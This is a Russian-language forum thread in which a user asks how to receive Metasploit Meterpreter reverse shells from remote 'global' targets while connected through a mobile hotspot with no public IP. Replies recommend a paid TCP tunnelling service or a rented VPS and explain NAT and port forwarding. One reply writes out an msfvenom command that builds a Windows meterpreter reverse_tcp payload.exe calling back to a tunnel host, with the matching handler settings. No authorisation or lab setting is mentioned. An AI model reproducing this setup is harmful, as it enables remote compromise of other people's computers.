• B правой части каждого сообщения есть стрелки и . Не стесняйтесь оценивать ответы. Чтобы автору вопроса закрыть свой тикет, надо выбрать лучший ответ. Просто нажмите значок в правой части сообщения.

Проблемы с захватом обратного соединения в Metasploit Meterpreter при использовании мобильного интернета

venboy7

venboy7

Member
18.07.2022
14
0
BIT
79
Приветствую! Уже несколько лет пытаюсь решить проблему с захватом обратного соединения в Metasploit Meterpreter на Kali Linux. Мой ноутбук подключен к интернету через точку доступа от телефона (обычная SIM-карта мобильного оператора). Пробовал множество методов, включая использование Ngrok, VPN, открытие портов, но ни один из них не помог достичь желаемого результата.
Основная задача — ловить цели с глобального IP и удалённо. Может, кто-то сталкивался с подобной ситуацией? Буду благодарен за любые советы или проверенные методы, которые работают в моем случае. Если у вас есть подробные инструкции по настройке, буду рад ознакомиться и попробовать их на практике.
 
Сортировать по дате Сортировать по голосам
Привет! Скорее всего, порты для входящих соединений закрыты, поэтому сессия не может достучаться до твоего msf листенера.
 
За 0 Против
Привет! Зачем тебе ngrock если ты в локальной сети твой ноутбук подключен к интернету через точку доступа от телефона? Пробуй отключить брандмауэр виндовый (defender) и должна прилететь сессия!
 
За 0 Против
Я открыл порты на ноутбуке и полностью отключил брандмауэр. Можете, пожалуйста, привести пример атаки на глобальную цель в моем случае?

N1GGA сказал(а):
Привет! Скорее всего, порты для входящих соединений закрыты, поэтому сессия не может достучаться до твоего msf листенера.
Нажмите, чтобы раскрыть...
Спасибо за ответ, в свободное время прошу дальше уточнить мой вопрос ниже.

mcfly сказал(а):
Привет! Зачем тебе ngrock если ты в локальной сети твой ноутбук подключен к интернету через точку доступа от телефона? Пробуй отключить брандмауэр виндовый (defender) и должна прилететь сессия!
Нажмите, чтобы раскрыть...
да, подключён через точку доступа, но у меня же нету глобального ip, как же тогда словить сессию от target'a😕

Спасибо за ответ, в свободное время прошу дальше уточнить мой вопрос ниже.
 
За 0 Против
venboy7 сказал(а):
да, подключён через точку доступа
Нажмите, чтобы раскрыть...
А перенаправление портов вы на этой точке доступа настраивали?

venboy7 сказал(а):
но у меня же нету глобального ip, как же тогда словить сессию от target'a
Нажмите, чтобы раскрыть...
Самый простой способ (если не брать тот же неработающий ngrok) - арендовать VPS или выделенный сервер и настроить подключение через него. У таких серверов чаще всего сразу выдаётся белый IP, ну а систему обычно можно поставить любую
 
За 1 Против
venboy7 сказал(а):
Я открыл порты на ноутбуке и полностью отключил брандмауэр. Можете, пожалуйста, привести пример атаки на глобальную цель в моем случае?


Спасибо за ответ, в свободное время прошу дальше уточнить мой вопрос ниже.


да, подключён через точку доступа, но у меня же нету глобального ip, как же тогда словить сессию от target'a😕

Спасибо за ответ, в свободное время прошу дальше уточнить мой вопрос ниже.
Нажмите, чтобы раскрыть...
Нашел замену ngroka руский сервис
Ссылка скрыта от гостей
делает тунели tcp подписка на месяц 299р

  • Туннельная нода в России, задержка радует
  • Клиент похож на ngrok, статичный бинарник, можно запускать как агента в фоне
  • Есть работа с заголовками, авторизация и прочие фишки
  • Есть инспектор запросов
  • Есть TCP тунннели
  • Приятная документация
  • Цена, всего 299 рублей в месяц
Запустил вроде пашет metasploit не тестил!

4.PNG
 
За 0 Против
mcfly сказал(а):
Нашел замену ngroka руский сервис
Ссылка скрыта от гостей
делает тунели tcp подписка на месяц 299р

  • Туннельная нода в России, задержка радует
  • Клиент похож на ngrok, статичный бинарник, можно запускать как агента в фоне
  • Есть работа с заголовками, авторизация и прочие фишки
  • Есть инспектор запросов
  • Есть TCP тунннели
  • Приятная документация
  • Цена, всего 299 рублей в месяц
Запустил вроде пашет metasploit не тестил!

Посмотреть вложение 76449
Нажмите, чтобы раскрыть...
Спасибо за совет! Я так понимаю условно в LHOST я пишу 127.0.0.1, а LPORT 4444?

f22 сказал(а):
А перенаправление портов вы на этой точке доступа настраивали?


Самый простой способ (если не брать тот же неработающий ngrok) - арендовать VPS или выделенный сервер и настроить подключение через него. У таких серверов чаще всего сразу выдаётся белый IP, ну а систему обычно можно поставить любую
Нажмите, чтобы раскрыть...
Спасибо за ответ! Но как сделать перенаправление портов на этой точке, если у меня интернет идёт от телефона, а в нем просто сим карта(но скорее всего я вас не понимаю, можете объяснить по подробнее в свободное время? )

f22 сказал(а):
А перенаправление портов вы на этой точке доступа настраивали?


Самый простой способ (если не брать тот же неработающий ngrok) - арендовать VPS или выделенный сервер и настроить подключение через него. У таких серверов чаще всего сразу выдаётся белый IP, ну а систему обычно можно поставить любую
Нажмите, чтобы раскрыть...
можете подсказать vps для моих целей? (не из самых дорогих, по возможности)
 
За 0 Против
venboy7 сказал(а):
Спасибо за совет! Я так понимаю условно в LHOST я пишу 127.0.0.1, а LPORT 4444?
Нажмите, чтобы раскрыть...
да все верно в multi/handler в LHOST я пишу 127.0.0.1, а LPORT 4444 ! а в msfvenom -p windows / meterpreter / reverse_tcp LHOST = ru.tuna.am LPORT = 20487 -f exe> payload.exe
 
Последнее редактирование:
За 0 Против
venboy7 сказал(а):
можете подсказать vps для моих целей? (не из самых дорогих, по возможности)
Нажмите, чтобы раскрыть...
Погуглите сравнение vps или поиск vps - есть много разных вариантов и по ценам, и по странам, и по возможностям. Для ваших целей подойдёт самый простой и дешёвый - главное, чтобы белый IP был.

venboy7 сказал(а):
Но как сделать перенаправление портов на этой точке
Нажмите, чтобы раскрыть...
Если аппарат не рутованый и у вас серый IP, то никак(
Вы поймите, ваш телефон работает как роутер и номинально все запросы из внешней сети приходят на него, а уже он перенаправляет их в ваш ноутбук (это очень примитивная схема), если не пробрасывать порты, то все эти пакеты из внешней сети так и будет принимать телефон и не будет передавать их дальше в сеть.
venboy7 сказал(а):
Я так понимаю условно в LHOST я пишу 127.0.0.1, а LPORT 4444?
Нажмите, чтобы раскрыть...
Откуда телефон/роутер узнает, что он должен передать пакет на порт 4444 именно на ваш ноут, а не просто отбросить его? Внутри сети у вас всё будет работать, а вот чтобы работало вне, нужно производить более тонкую настройку - поднимать сервер на VPS, там запускать листенер и либо прямо там слушать подключение, либо подключаться к нему со своей локальной машины
 
За 0 Против
f22 сказал(а):
Погуглите сравнение vps или поиск vps - есть много разных вариантов и по ценам, и по странам, и по возможностям. Для ваших целей подойдёт самый простой и дешёвый - главное, чтобы белый IP был.


Если аппарат не рутованый и у вас серый IP, то никак(
Вы поймите, ваш телефон работает как роутер и номинально все запросы из внешней сети приходят на него, а уже он перенаправляет их в ваш ноутбук (это очень примитивная схема), если не пробрасывать порты, то все эти пакеты из внешней сети так и будет принимать телефон и не будет передавать их дальше в сеть.

Откуда телефон/роутер узнает, что он должен передать пакет на порт 4444 именно на ваш ноут, а не просто отбросить его? Внутри сети у вас всё будет работать, а вот чтобы работало вне, нужно производить более тонкую настройку - поднимать сервер на VPS, там запускать листенер и либо прямо там слушать подключение, либо подключаться к нему со своей локальной машины
Нажмите, чтобы раскрыть...
Спасибо Вам за ответ! придётся искать vps
 
За 0 Против
Для ответа нужно войти/зарегистрироваться
Мы в соцсетях:

Обучение наступательной кибербезопасности в игровой форме. Начать игру!

Верх Низ